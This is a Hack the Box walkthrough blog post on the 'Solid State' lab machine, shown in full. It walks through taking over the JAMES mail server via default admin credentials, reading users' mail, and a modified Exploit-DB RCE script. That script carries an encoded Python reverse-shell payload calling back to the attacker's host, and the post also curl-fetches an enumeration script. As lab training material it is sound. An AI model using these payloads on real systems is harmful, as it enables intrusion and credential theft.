Hack the Box: Solid State Walkthrough

By January 27, 2018 Walkthrough

Hey ya’ll,

Welcome to another Hack the Box walkthrough. Today, we’ll be talking about the newly retired Solid State machine. This was one of the first ones that I was able to do on my own without hints while working on the OSCP, so it’s one that I hold near and dear to my heart. Anyway, enough blabbing, let’s get hacking.

Reconnaissance

First thing we need to do with any new host is scan it and learn more about what services are running on the machine. Let’s run a quick top 100 port scan with nmap. With this, we see:


# Nmap 7.60 scan initiated Tue Jan 9 16:24:07 2018 as: nmap -sS -T4 -sV -oA 00-tcp-top100/top-100 --stats-every 60s --max-retries 3 --defeat-rst-ratelimit --top-ports 100 --script banner --reason solidstate.htb
.
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up, received echo-reply ttl 63 (0.021s latency).
Not shown: 95 closed ports
Reason: 95 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1
25/tcp open smtp syn-ack ttl 63 JAMES smtpd 2.3.2
| banner: 220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Tue,
|_ 9 Jan 2018 16:24:16 -0500 (EST)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 syn-ack ttl 63 JAMES pop3d 2.3.2
|_banner: +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
119/tcp open nntp syn-ack ttl 63 JAMES nntpd (posting ok)
|_banner: 200 solidstate NNTP Service Ready, posting permitted
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 9 16:24:29 2018 -- 1 IP address (1 host up) scanned in 21.60 seconds

Ok, so we see a few things that look interesting. Looks like some web ports, some email ports, and SSH. It always interests me when multiple services have a related name, those often seem to present a nice attack surface. Doing a quick google search, we see something that catches our attention:

Google search for Apache JAMES server exploits

Well that’s nice, the version matches what we found on the server. So lets dig into this more. Looking into the exploit, we see that it’s an authenticated command execution vulnerability. Worth being aware of in case we can leverage it anyway. By default, it seems to be connecting to the target on port 4555 with default credentials of root for both the username and password as seen below:


...
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1] def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
...

Let’s take a look at our target and see if port 4555 is open:


root@kali:~# nmap -sS -p4555 -sV --reason 10.10.10.51
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-16 17:03 EST
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up, received echo-reply ttl 63 (0.018s latency).
PORT STATE SERVICE REASON VERSION
4555/tcp open james-admin syn-ack ttl 63 JAMES Remote Admin 2.3.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

Nice! It’s open. Lets take See if we can login. If we can, what can we do?


root@kali:~# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Interesting. So we can login, we have a few users on the server. This should mean our exploit at least can be sent. Whether we can get it to trigger though is still a different story. Easiest way though to see if any of the users has email of interest is to manually reset their passwords. Lets do that then login to their email to see what they have to say:


setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
quit
Bye
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
PASS james
+OK Welcome james
LIST
+OK 0 0
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS thomas
+OK Welcome thomas
LIST
+OK 0 0
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path:
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for ;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a temporary password to login to her accounts.
Thank you in advance.
Respectfully,
James

Interesting. John was told by James that they should send Mindy her password. That could be useful. Let’s look at Mindy’s account:


root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path:
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for ;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path:
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for ;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
.
username: mindy
pass: P@55W0rd1!2@
.
Respectfully,
James
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
root@kali:~#

Wonderful. Now we have credentials. Lets see if they work on SSH. Maybe we don’t need an exploit!


root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
.
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 16 00:55:41 2018 from 10.10.14.15
mindy@solidstate:~$ echo $0
-rbash

OK, looks like we’re in rbash and will need to use the exploit. Lets give that a try.

Exploitation

OK, so we have credentials that work over SSH and an exploit. So let’s retrieve https://www.exploit-db.com/exploits/35513/ and fix it for our use.


root@kali:~/Pentest/10.51-solidstate/02-exploitation# searchsploit -m 35513.py
Exploit: Apache James Server 2.3.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/35513/
Path: /usr/share/exploitdb/exploits/linux/remote/35513.py
Copied to: /root/Pentest/10.51-solidstate/02-exploitation/35513.py

Now that we have the file, let’s make some changes. Specifically, we need to configure our payload. Currently, we have this:


payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root

That doesn’t help us. We may not be root for one, and if we are, we want a shell. Because of that, we want to change our payload. Lets use msfvenom to build a new one. The following command should work for us:


root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.16 LPORT=4444 SHELL=/bin/bash -a cmd --platform Unix -e generic/none
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 557 (iteration=0)
generic/none chosen with final size 557
Payload size: 557 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgICAgIDsgICAgICAgaG9zdD0iMTAuMTAuMTQuMTYiICAgICAgICAgOyAgICAgICBwb3J0PTQ0NDQgICAgICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICwgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7ICAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgIHBvcnQpKSAgICAgICAgIDsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMCkgICAgICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDEpICAgICAgICAgOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAyKSAgICAgICAgIDsgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"

So with our new payload, lets put it into the script:


payload = 'python -c "exec(\'aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgICAgIDsgICAgICAgaG9zdD0iMTAuMTAuMTQuMTYiICAgICAgICAgOyAgICAgICBwb3J0PTQ0NDQgICAgICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICwgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7ICAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgIHBvcnQpKSAgICAgICAgIDsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMCkgICAgICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDEpICAgICAgICAgOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAyKSAgICAgICAgIDsgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp\'.decode(\'base64\'))"'

Perfect. Now our exploit is ready, so we run our exploit with:


root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# python fixed-35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Wonderful. Now, let’s start a listener in a different window:

nc -nlvp 4444

Then login to trigger it:

root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
.
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <28046011.0.1516203798387.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.16 ([10.10.14.16])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 472
for <../../../../../../../../etc/bash_completion.d@localhost>;
Wed, 17 Jan 2018 10:43:18 -0500 (EST)
Date: Wed, 17 Jan 2018 10:43:18 -0500 (EST)
From: team@team.pl
.
: No such file or directory

and in a listener we can see that we caught a shell!


root@kali:~/pentest/10.51-solidstate/02-exploitation/02-success# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.51] 43640
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Reverse Shell

Getting our initial foothold

Nice. We have a shell on our target now. Let’s improve our TTY:


python -c 'import pty; pty.spawn("/bin/bash")'

Now we have a pretty good shell. We can improve it a little more:


(keyboard) Ctrl+Z
stty raw -echo
fg
reset

Perfect, we should be able to use things like tab completions now. Much much better for us.

Privilege Escalation

First thing we need to do is learn a little more about who we are.


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ sudo -l
bash: sudo: command not found
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Hm, no sudo. Odd but good to know. Let’s do a more complete enumeration of the host.


cd /tmp
curl -O http://10.10.14.16/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t -k password

And with this, we get a ton of new information.


#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#
.
Debug Info
keyword = password
thorough tests = enabled
.
.
Scan started at:
Wed Jan 17 12:49:27 EST 2018
.
.
### SYSTEM ##############################################
Kernel information:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
.
.
Kernel information (continued):
Linux version 4.9.0-3-686-pae (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06)
.
.
Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
.
.
Hostname:
solidstate
.
.
### USER/GROUP ##########################################
Current user/group info:
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
.
.
Users that have previously logged onto the system:
Username Port From Latest
root pts/1 192.168.11.142 Tue Aug 22 14:04:31 -0400 2017
mindy pts/0 10.10.14.16 Wed Jan 17 12:43:58 -0500 2018
.
.
Who else is logged on:
12:49:27 up 2:11, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mindy pts/0 10.10.14.16 12:43 5:29 0.05s 0.03s python -c import pty; pty.spawn("/bin/bash")
.
.
Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=106(rtkit) gid=110(rtkit) groups=110(rtkit)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=109(geoclue) gid=115(geoclue) groups=115(geoclue)
uid=110(avahi) gid=117(avahi) groups=117(avahi)
uid=111(colord) gid=118(colord) groups=118(colord)
uid=112(saned) gid=119(saned) groups=119(saned),116(scanner)
uid=113(speech-dispatcher) gid=29(audio) groups=29(audio)
uid=114(pulse) gid=120(pulse) groups=120(pulse),29(audio)
uid=115(hplip) gid=7(lp) groups=7(lp)
uid=116(Debian-gdm) gid=122(Debian-gdm) groups=122(Debian-gdm)
uid=117(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(james) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),114(lpadmin),116(scanner)
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
.
.
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
.
.
Super user account(s):
root
.
.
./LinEnum.sh: line 240: echo: write error: Broken pipe
./LinEnum.sh: line 249: echo: write error: Broken pipe
Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Aug 22 11:37 .
drwxr-xr-x 22 root root 4.0K Jun 18 2017 ..
drwxr-xr-x 16 james osboxes 4.0K Aug 22 10:20 james
drwxr-x--- 4 mindy mindy 4.0K Sep 8 17:40 mindy
.
.
Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py
--w--w--w- 1 root root 0 Jan 17 12:49 /sys/fs/cgroup/memory/cgroup.event_control
.
.
World-readable files within /home:
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_logout
-rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
-rw-r--r-- 1 root root 1001 Aug 22 13:41 /home/mindy/.bashrc
-rw-r--r-- 1 root root 338 Aug 22 13:59 /home/mindy/.bash_profile
-rw-r--r-- 1 james osboxes 220 Jun 18 2017 /home/james/.bash_logout
-rw-r--r-- 1 james osboxes 0 Jun 18 2017 /home/james/.local/share/gnome-settings-daemon/input-sources-converted
-rw-r--r-- 1 james osboxes 21679 Aug 22 10:20 /home/james/.local/share/xorg/Xorg.0.log
-rw-r--r-- 1 james osboxes 21678 Jun 18 2017 /home/james/.local/share/xorg/Xorg.0.log.old
-rw-r--r-- 1 james osboxes 675 Jun 18 2017 /home/james/.profile
-rw-r--r-- 1 james osboxes 3526 Jun 18 2017 /home/james/.bashrc
.
.
Home directory contents:
total 28K
drwxr-x--- 4 mindy mindy 4.0K Sep 8 17:40 .
drwxr-xr-x 4 root root 4.0K Aug 22 11:37 ..
-rw-r--r-- 1 root root 0 Aug 22 13:41 .bash_history
-rw-r--r-- 1 root root 0 Aug 22 13:41 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 13:59 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 13:41 .bashrc
drwxr-x--- 2 mindy mindy 4.0K Aug 22 13:45 bin
-rw------- 1 root root 0 Aug 22 13:41 .rhosts
-rw------- 1 root root 0 Aug 22 13:41 .shosts
drw------- 2 root root 4.0K Aug 22 13:41 .ssh
-rw------- 1 mindy mindy 33 Sep 8 17:40 user.txt
.
.
Root is allowed to login via SSH:
PermitRootLogin yes
.
.
### ENVIRONMENTAL #######################################
Environment information:
SSH_CONNECTION=10.10.14.16 54760 10.10.10.51 22
LANG=en_US.UTF-8
OLDPWD=/home/mindy
XDG_SESSION_ID=48
USER=mindy
PWD=/tmp
HOME=/home/mindy
SSH_CLIENT=10.10.14.16 54760 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mindy
SHELL=/bin/rbash
TERM=xterm-256color
SHLVL=4
LOGNAME=mindy
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
XDG_RUNTIME_DIR=/run/user/1001
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
.
.
Path information:
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
.
.
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
.
.
Current umask value:
0022
u=rwx,g=rx,o=rx
.
.
umask value as specified in /etc/login.defs:
UMASK 022
.
.
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
.
.
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 May 3 2015 /etc/crontab
.
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rw-r--r-- 1 root root 285 May 29 2017 anacron
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
.
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 311 May 29 2017 0anacron
-rwxr-xr-x 1 root root 539 Jul 18 2017 apache2
-rwxr-xr-x 1 root root 1474 Jun 1 2017 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
-rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
.
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
.
/etc/cron.monthly:
total 24
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 313 May 29 2017 0anacron
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
.
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 312 May 29 2017 0anacron
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
.
.
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
.
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
.
.
Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 May 29 2017 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron
.
# See anacron(8) and anacrontab(5) for details.
.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
.
# These replace cron's entries
1 5 cron.daily run-parts --report /etc/cron.daily
7 10 cron.weekly run-parts --report /etc/cron.weekly
@monthly 15 cron.monthly run-parts --report /etc/cron.monthly
.
.
When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 7 root root 4096 Jun 18 2017 ..
-rw------- 1 root root 9 Jan 17 10:43 cron.daily
-rw------- 1 root root 9 Jan 17 10:53 cron.monthly
-rw------- 1 root root 9 Jan 17 10:48 cron.weekly
.
.
### NETWORKING ##########################################
Network & IP info:
ens33: flags=4163 mtu 1500
inet 10.10.10.51 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb2:c91f prefixlen 64 scopeid 0x20 inet6 dead:beef::250:56ff:feb2:c91f prefixlen 64 scopeid 0x0
ether 00:50:56:b2:c9:1f txqueuelen 1000 (Ethernet)
RX packets 10438 bytes 993880 (970.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 466 bytes 62037 (60.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 41828 bytes 3387546 (3.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 41828 bytes 3387546 (3.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
.
.
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.51:57234 10.10.14.16:80 TIME_WAIT -
tcp 0 0 10.10.10.51:22 10.10.14.16:54760 ESTABLISHED -
tcp 0 1139 10.10.10.51:43642 10.10.14.16:4444 ESTABLISHED 1369/python
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::119 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::4555 :::* LISTEN -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
.
.
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:33663 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:1900 0.0.0.0:* -
udp6 0 0 :::53936 :::* -
udp6 0 0 :::5353 :::* -
.
.
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 1.0 26952 5500 ? Ss 10:38 0:01 /sbin/init
